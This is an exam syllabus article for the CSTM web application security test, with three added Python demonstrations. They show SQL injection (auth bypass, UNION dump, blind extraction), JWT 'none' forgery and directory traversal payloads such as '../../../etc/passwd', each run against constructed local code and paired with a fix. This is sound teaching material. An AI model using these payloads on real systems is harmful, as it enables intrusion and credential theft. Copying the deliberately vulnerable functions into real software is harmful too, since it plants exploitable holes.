This article highlights the key areas of web technologies you need to understand to pass the CSTM exam. The full syllabus, covering all key knowledge areas for CSTM, can be found on our website. The Cyber Scheme's CSTM training maps to the CSTM syllabus and will give you the confidence to sit our NCSC-accredited exam knowing the topics and knowledge domains that are likely to come up.
Web Servers
- Can identify web servers on a target network and can remotely determine their type and version.
- Has knowledge of vulnerabilities in the following common application frameworks, servers and technologies:
• .NET • J2EE • Coldfusion • Ruby on Rails • NodeJS
- Understands the purpose, operation, limitation and security attributes of web proxy servers.
- Can understand the concepts of virtual hosting and web proxies.
- Understands and can demonstrate the remote exploitation of web servers.
Reconnaissance
- Can use spidering tools and understands their relevance in a web application test for discovering linked content.
- Understands and can demonstrate forced browsing techniques to discover default or unlinked content.
- Can identify functionality within client-side code.
Protocols and Methods
- Understands all HTTP methods and response codes.
- Understands HTTP header fields relating to security features.
- Can demonstrate the use of web protocols, including:
• HTTP • HTTPS • WebSockets.
Languages
- Understands common web mark-up and programming languages, including:
• .NET • ASP Classic • Perl • PHP • JSP • Python • JavaScript
- Understands and can demonstrate how the insecure implementation of software developed using these languages can be exploited (the candidate may select two languages).
APIs
- Understands and can demonstrate the use of web-based APIs to access remote services.
- Understands the use of tools and techniques to identify new OS and software vulnerabilities.
- Understands common authentication techniques used in web APIs, e.g. API keys.
- Can demonstrate the use of relevant tools to test APIs, e.g. SoapUI and Postman.
- Understands and can demonstrate how the insecure implementation of web-based APIs can be exploited.
- Understands common payload formats such as XML and JSON.
- Can interpret API definition files, e.g. WSDL and Swagger (OpenAPI).
Information Gathering
- Can gather information from a web site and application mark-up or programming language, including:
• hidden form fields • database connection strings • user account credentials • developer comments
• external and/or authenticated-only URLs.
- Can gather information about a web site and application from the error messages it generates.
Authentication
- Understands common authentication vulnerabilities, including:
• Transport of credentials over an unencrypted channel
• Testing for username enumeration • Brute-force testing • Authentication bypass
• Session hijacking • Insecure password reset features • Insufficient logout timeout/functionality
• Vulnerable CAPTCHA controls • Race Conditions • Lack of MFA
Authorisation
- Understands common pitfalls associated with the design and implementation of application authorisation mechanisms.
Input Validation
- Understands the importance of input validation and how it can be implemented, e.g. allow-lists, deny-lists and regular expressions.
- Can understand the need for server-side validation and the flaws associated with client-side validation.
Fuzzing
- Understands fuzzing and its use in web application testing.
Cross Site Scripting
- Understands cross-site scripting (XSS) and can demonstrate the launching of a successful XSS attack.
- Understands the difference between persistent (stored) and reflected XSS.
SQL Injection
- Exploiting UNION based injection.
- Identifying SQL injection.
- Exploiting auth bypass (' or 'a'='a).
- Exploiting SQL injection to execute operating system commands or read files.
Blind SQL Injection
- Can determine the existence of a blind SQL injection condition in a web application.
- Can exploit a blind SQL injection vulnerability.
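The SQL injection techniques listed under the two headings above (auth bypass with ' or 'a'='a, UNION-based extraction and boolean-based blind extraction), worked through against a throw-away SQLite application. This is an added example and is not part of the CSTM syllabus or The Cyber Scheme's training material; the tables, user names and passwords are constructed for the demo, and the function names are the example's own.

```python
# Added example: a throw-away SQLite app showing the injection techniques
# listed above (auth bypass, UNION, boolean-based blind) and the parameterised
# fix. Sample users and passwords are constructed for the demo only.
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data. Passwords are stored in the clear purely so the
    dumped values are recognisable; a real application would store hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
                     [("alice", "Winter2024!", "admin"), ("bob", "letmein", "user")])
    conn.executemany("INSERT INTO products (name) VALUES (?)", [("widget",), ("gadget",)])
    return conn


def vulnerable_login(conn, username, password):
    """The flaw: both inputs are pasted straight into the SQL text."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def vulnerable_search(conn, term):
    """Same flaw in a search box; the result list is the attacker's output channel."""
    sql = f"SELECT name FROM products WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def safe_login(conn, username, password):
    """Fix: a parameterised query. The driver never treats input as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def auth_bypass(conn):
    """' or 'a'='a in the password field: AND binds tighter than OR, so the WHERE
    clause becomes (username='' AND password='') OR 'a'='a', which is always true
    and returns the first row in the table (here the admin)."""
    return vulnerable_login(conn, "", "' or 'a'='a")


def union_dump(conn):
    """Close the LIKE literal, append a UNION with the same column count, and
    comment out the trailing %' that the application appends."""
    payload = "%' UNION SELECT username || ':' || password FROM users --"
    return vulnerable_search(conn, payload)


def blind_extract(conn, target_user, max_len=64):
    """Boolean-based blind extraction: the only signal is results / no results.
    unicode(substr(...)) avoids quoting the guessed character, and a binary
    search over the code point needs about 7 requests per character."""
    def oracle(condition):
        return bool(vulnerable_search(conn, f"%' AND ({condition}) --"))

    secret = f"(SELECT password FROM users WHERE username = '{target_user}')"
    length = next((n for n in range(1, max_len + 1) if oracle(f"length({secret}) = {n}")), None)
    if length is None:
        raise ValueError("could not determine length")
    recovered = ""
    for i in range(1, length + 1):
        lo, hi = 32, 126                      # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({secret}, {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("bypass ->", auth_bypass(db))
    print("union  ->", union_dump(db))
    print("blind  ->", blind_extract(db, "alice"))
    print("fixed  ->", safe_login(db, "", "' or 'a'='a"))
```

The blind routine is the part worth studying: it never sees the password, only whether the search returned rows, and it keeps the guessed character out of the query text entirely by comparing code points. Against the parameterised login the same payload is just a 10-character password that matches nobody.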
Sessions
- Identifying JWTs.
- Understanding the difference between HMAC and public key JWTs.
- Understands and can exploit session fixation vulnerabilities.
- Exploiting the "none" algorithm or a lack of signature checking in JWTs.
- Understands the security implications of session IDs exposed in URLs.
- Can identify the session control mechanism used within a web application.
- Understands the role of sessions in CSRF attacks.
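The JWT items above (identifying a JWT, telling HMAC from public-key tokens, and exploiting "none") demonstrated with a minimal implementation. This is an added example, not code from The Cyber Scheme or from any JWT library; the secret is constructed for the demo and the function names are the example's own.

```python
# Added example: a minimal JWT issuer with two verifiers, one that lets the
# token choose its own algorithm (vulnerable) and one that pins it (fixed).
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed secret for the demo only.
SECRET = b"constructed-demo-secret-do-not-reuse"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a token the way a server would: HMAC-SHA256 over header.payload."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(claims)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def classify(token: str) -> str:
    """Identify a JWT from its header: HS* is a shared-secret HMAC, RS*/PS*/ES*/EdDSA
    is a public-key signature, 'none' is unsigned."""
    parts = token.split(".")
    if len(parts) != 3:
        return "not-a-jwt"
    try:
        header = json.loads(b64url_decode(parts[0]))
    except ValueError:                      # bad base64 or not JSON
        return "not-a-jwt"
    if not isinstance(header, dict):
        return "not-a-jwt"
    alg = str(header.get("alg", ""))
    if alg.startswith("HS"):
        return "hmac"
    if alg.startswith(("RS", "PS", "ES")) or alg == "EdDSA":
        return "public-key"
    if alg.lower() == "none":
        return "unsigned"
    return "unknown"


def forge_none(claims: dict) -> str:
    """Attacker: no key needed, just alg=none and an empty signature segment."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."


def verify_naive(token: str, secret: bytes) -> Optional[dict]:
    """Vulnerable: the verifier honours whatever alg the token declares."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(body_b64))       # accepted unsigned
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return json.loads(b64url_decode(body_b64))
    return None


def verify_strict(token: str, secret: bytes) -> Optional[dict]:
    """Fixed: the server decides the algorithm; the header must match or the token is rejected."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    try:
        header = json.loads(b64url_decode(parts[0]))
    except ValueError:
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(parts[2])):
        return None
    return json.loads(b64url_decode(parts[1]))
```

Pinning the algorithm server-side is the fix for both the "none" case and its cousin, the key-confusion attack in which a token signed with HS256 using the server's RSA public key as the HMAC secret is accepted by a verifier that switches algorithm on the header's say-so. When testing, check the three-segment shape and decode the first segment before anything else: the alg value tells you whether you are looking for a leaked shared secret or for a signature-verification bypass.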
Cryptography
- Understands how cryptography can be used to protect data in transit and data at rest, both on the server and client side.
- Identification and exploitation of encoded values (e.g. Base64).
- Understands the concepts of TLS and can determine whether a TLS-enabled web server has been configured in compliance with best practice (i.e. it supports recommended ciphers and key lengths).
- Identification and exploitation of cryptographic values (e.g. MD5 hashes).
Directory Traversal
- Can understand and identify directory traversal vulnerabilities within applications.
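Directory traversal as an added example (not part of the CSTM material): a typical vulnerable path resolver next to one that canonicalises and then checks containment, exercised with the payload forms a tester tries first. The web root and file names are constructed and need not exist on disk; the code assumes a POSIX filesystem.

```python
# Added example: resolving a user-supplied path under a web root, the broken way
# and the checked way. ROOT is a constructed path for the demo.
import os
import urllib.parse

ROOT = "/srv/app/static"


def vulnerable_resolve(root: str, requested: str) -> str:
    """How many handlers do it: join and normalise, with no containment check.
    os.path.join discards `root` when `requested` is absolute, and ../ walks out."""
    return os.path.normpath(os.path.join(root, requested))


def safe_resolve(root: str, requested: str) -> str:
    """Decode once, drop leading separators, canonicalise, then verify the result
    is still under root. Blacklisting '../' is not enough: encoded and mixed
    forms slip past string matching, but not past the canonical-path check."""
    root = os.path.realpath(root)
    decoded = urllib.parse.unquote(requested)
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"path escapes web root: {requested!r}")
    return candidate


def escapes_root(root: str, requested: str) -> bool:
    """True when the checked resolver rejects the request."""
    try:
        safe_resolve(root, requested)
        return False
    except PermissionError:
        return True


# Constructed test payloads: plain, URL-encoded, dot-encoded and double-encoded.
PAYLOADS = [
    "../../../etc/passwd",
    "..%2F..%2F..%2Fetc%2Fpasswd",
    "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "%252e%252e/%252e%252e/etc/passwd",   # double-encoded: decodes once to a literal name
    "/etc/passwd",
    "css/site.css",
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p:40} vulnerable -> {vulnerable_resolve(ROOT, p):30} "
              f"escapes after check: {escapes_root(ROOT, p)}")
```

Two behaviours of the checked version are deliberate: an absolute request such as /etc/passwd is served from under the root rather than rejected, and a double-encoded payload is not rejected either, because after one decode it names a literal directory called %2e%2e inside the root. Only if the application decodes a second time somewhere else does that payload become a traversal, which is exactly what a tester probes for.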
File Uploads
- Understands and can identify common vulnerabilities with file upload capabilities within applications.
- Can generate malicious payloads in a variety of common file formats.
- Understands the role of MIME types in relation to file upload features.
CRLF Attacks
- Understands and can demonstrate CRLF injection, i.e. injecting carriage-return/line-feed sequences into user-controlled values that are reflected into HTTP response headers.
Application Logic Flaws
- Can assess and exploit vulnerabilities within the functional logic, function access control and business logic of an application.